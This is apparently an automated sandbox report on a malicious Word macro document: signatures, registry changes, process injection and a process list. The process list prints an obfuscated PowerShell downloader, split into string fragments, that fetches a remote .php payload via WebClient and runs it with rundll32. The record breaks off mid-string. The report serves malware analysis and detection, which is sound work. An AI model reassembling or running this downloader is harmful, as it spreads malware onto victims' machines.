Malware Analysis Report

2024-10-24 21:48

Sample ID 240520-ex2ehaca5x
Target 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118
SHA256 54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
Tags
macro macro_on_action
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0

Threat Level: Likely malicious

The file 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

macro macro_on_action

Office macro that triggers on suspicious action

Suspicious Office macro

Executes dropped EXE

Loads dropped DLL

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks processor information in registry

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-20 04:19

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-20 04:19

Reported

2024-05-20 04:22

Platform

win7-20240220-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2284 wrote to memory of 2888 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe
PID 3040 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp 